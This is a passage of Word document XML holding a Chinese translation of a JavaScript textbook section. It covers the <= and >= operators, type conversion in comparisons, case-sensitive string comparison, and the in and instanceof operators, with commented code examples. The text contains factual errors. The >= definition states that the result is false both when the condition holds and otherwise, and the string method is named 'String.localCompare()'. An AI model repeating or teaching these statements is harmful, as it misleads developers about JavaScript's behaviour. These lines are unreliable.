    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>小于等于</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果第一个操作数小于或者等于第二个操作数，则</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符的计算结果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>大于等于</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>=)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果第一个操作数大于或者等于第二个操作数，则</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>=”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符的计算结果为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>；否则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>比较操作符的操作数可能是任意类型。然而，只有数字和字符串才能真正执行比较操作，因此那些不是数字和字符串的操作数都将进行类型转换，类型转换规则如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果操作数为对象，那么这个对象将依照</w:t>
      </w:r>
      <w:r>
        <w:t>3.8.3</w:t>
      </w:r>
      <w:r>
        <w:t>节结尾处所描述的转换规则转换为原始值：如果</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个原始值，那么直接使用这个原始值。否则，使用</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>的转换结果进行比较操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在对象转换为原始值之后，如果两个操作数都是字符串，那么将依照字母表的顺序对两个字符串进行比较，这里提到的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>字母表顺序</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>是指组成这个字符串的</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>位</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>字符的索引顺序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在对象转换为原始值之后，如果至少有一个操作数不是字符串，那么两个操作数都将转换为数字进行数值比较。</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>-0</w:t>
      </w:r>
      <w:r>
        <w:t>是相等的。</w:t>
      </w:r>
      <w:r>
        <w:t>Infini</w:t>
      </w:r>
      <w:r>
        <w:t>ty</w:t>
      </w:r>
      <w:r>
        <w:t>比其他任何数字都大（除了</w:t>
      </w:r>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>本身），</w:t>
      </w:r>
      <w:r>
        <w:t>-Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>比其他任何数字都小（除了它自身）。如果其中一个操作数是（或转换后是）</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>，那么比较操作符总是返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>字符串是一个由</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>位整数值组成的序列，字符串的比较也只是两个字符串中的字符的数值比较。由</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>定义的字符编码顺序和任何特定语言或者本地语言字符集中</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的传统字符编码顺序不尽相同。注意，字符串比较是区分大小写的，所有的大写的</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>字母都</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>小于</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>小写的</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>字母。如果不注意这条不起眼的规</w:t>
      </w:r>
      <w:r>
        <w:t>则的话会造成一些小麻烦。比如，使用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>小于运算符比较</w:t>
      </w:r>
      <w:r>
        <w:t>"Zoo"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"aardvark"</w:t>
      </w:r>
      <w:r>
        <w:t>，结果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参照</w:t>
      </w:r>
      <w:r>
        <w:t>String.localCompare()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来获取更多字符串比较的相关信息，</w:t>
      </w:r>
      <w:r>
        <w:t>String.localCompare()</w:t>
      </w:r>
      <w:r>
        <w:t>方法更加健壮可靠，这个方法参照本地语言的字母表定义的字符次序。对于那些不区分字母大小写的比较来说，则需要首先将字符串转全部换为小写字母或者大写字母，通过</w:t>
      </w:r>
      <w:r>
        <w:t>String.toLowerCase()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>String.toUpperCase()</w:t>
      </w:r>
      <w:r>
        <w:t>做大小写的转换。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对于数字和字符串操作符来说，加</w:t>
      </w:r>
      <w:r>
        <w:t>号运算符和比较运算符的行为都有所不同，前者更偏爱字符串，如果它的其中一个操作数是字符串的话，则进行字符串连接操作。而比较运算符则更偏爱数字，只有在两个操作数都是字符串的时候，才会进行字符串的比较：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>1+2//</w:t>
      </w:r>
      <w:r>
        <w:t>加法</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>结果是</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"1"+"2"//</w:t>
      </w:r>
      <w:r>
        <w:t>字符串连接，结果是</w:t>
      </w:r>
      <w:r>
        <w:t>"12"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"1"+2//</w:t>
      </w:r>
      <w:r>
        <w:t>字符串链接，</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>转换为</w:t>
      </w:r>
      <w:r>
        <w:t>"2"</w:t>
      </w:r>
      <w:r>
        <w:t>，结果是</w:t>
      </w:r>
      <w:r>
        <w:t>"12"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>3//</w:t>
      </w:r>
      <w:r>
        <w:t>数字的比较，结果为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"11"</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>"3"//</w:t>
      </w:r>
      <w:r>
        <w:t>字符串比较，结果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"11"</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>3//</w:t>
      </w:r>
      <w:r>
        <w:t>数字的比较，</w:t>
      </w:r>
      <w:r>
        <w:t>"11"</w:t>
      </w:r>
      <w:r>
        <w:t>转换为</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>，结果为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"one"</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>3//</w:t>
      </w:r>
      <w:r>
        <w:t>数字的比</w:t>
      </w:r>
      <w:r>
        <w:t>较，</w:t>
      </w:r>
      <w:r>
        <w:t>"one"</w:t>
      </w:r>
      <w:r>
        <w:t>转换为</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>，结果为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>最后，需要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=”</w:t>
      </w:r>
      <w:r>
        <w:t>（小于等于）和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>=”</w:t>
      </w:r>
      <w:r>
        <w:t>（大于等于）运算符在判断相等的时候，并不依赖于相等运算符和严格相等运算符的比较规则。相反，小于等于运算符只是简单的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>不大于</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，大于等于运算符也只是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>不小于</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。只有一个例外，那就是当其一个操作数是（或者转换后是）</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>的时候，所有</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个比较运算符均返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="4_9_3_inYun_Suan_Fu_"/>
      <w:r>
        <w:t>4.9.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t>运算符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t>运算符希望它的左操作数是一个字符串或可以转换为字符串，希望它的右操作数是一个对象。如果右侧的对象拥有一个名为左操作数值的属性</w:t>
      </w:r>
      <w:r>
        <w:t>名，那么表达式返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var point={x:1,y:1};//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"x"in point//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>对象有一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>"x"</w:t>
      </w:r>
      <w:r>
        <w:t>的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"z"in point//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:</w:t>
      </w:r>
      <w:r>
        <w:t>对象中不存在名为</w:t>
      </w:r>
      <w:r>
        <w:t>"z"</w:t>
      </w:r>
      <w:r>
        <w:t>的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"toString"in point//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>对象继承了</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var data=[7,8,9];//</w:t>
      </w:r>
      <w:r>
        <w:t>拥有三个元素的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"0"in data//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>数组包含元素</w:t>
      </w:r>
      <w:r>
        <w:t>"0"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>1 in data//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>数字转换为字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3 in </w:t>
      </w:r>
      <w:r>
        <w:t>data//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:</w:t>
      </w:r>
      <w:r>
        <w:t>没有索引为</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="4_9_4_instanceofYun_Suan_Fu_"/>
      <w:r>
        <w:t>4.9.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符希望左操作数是一个对象，右操作数标识对象的类。如果左侧的对象是右侧类的实例，则表达式返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章将会讲到，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中对象的类是通过初始化它们的构造函数来定义的。这样的话，</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>的右操作数应当是一个函数。比如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var d=new Date();//</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>Date()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数来创建一个新对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>d instanceof Date;//</w:t>
      </w:r>
      <w:r>
        <w:t>计算结果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>是由</w:t>
      </w:r>
      <w:r>
        <w:t>Date()</w:t>
      </w:r>
      <w:r>
        <w:t>创建的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>d instanceof Object;//</w:t>
      </w:r>
      <w:r>
        <w:t>计算结果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，所有的对象都是</w:t>
      </w:r>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:t>的实例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>d instanceof Number;//</w:t>
      </w:r>
      <w:r>
        <w:t>计算结果为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>不是一个</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[1,2,3];//</w:t>
      </w:r>
      <w:r>
        <w:t>通过数组直接量的写法创建一个数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a instanceof Array;//</w:t>
      </w:r>
      <w:r>
        <w:t>计算结果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>是一个数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a instanceof Object;//</w:t>
      </w:r>
      <w:r>
        <w:t>计算结果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，所有的数组都是对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">a instanceof </w:t>
      </w:r>
      <w:r>
        <w:t>RegExp;//</w:t>
      </w:r>
      <w:r>
        <w:t>计算结果为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，数组不是正则表达式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，所有的对象都是</w:t>
      </w:r>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:t>的实例。当通过</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>判断一个对象是否是一个类的实例的时候，这个判断也会包含对</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>父类</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>superclass</w:t>
      </w:r>
      <w:r>
        <w:t>）的检测。如果</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>的左操作数不是对象的话，</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。如果右操作数不是函数，则抛出一个类型错误异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了理解</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符是如何工作的，必须首先理解</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>原型链</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>prototype chain</w:t>
      </w:r>
      <w:r>
        <w:t>）。原型链作为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的继承机制，</w:t>
      </w:r>
      <w:r>
        <w:t>将在</w:t>
      </w:r>
      <w:r>
        <w:t>6.2.2</w:t>
      </w:r>
      <w:r>
        <w:t>节详细讲述。为了计算表达式</w:t>
      </w:r>
      <w:r>
        <w:t>o instanceof f</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScr</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ipt</w:t>
      </w:r>
      <w:r>
        <w:t>首先计算</w:t>
      </w:r>
      <w:r>
        <w:t>f.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>，然后在原型链中查找</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>，如果找到，那么</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>（或者</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
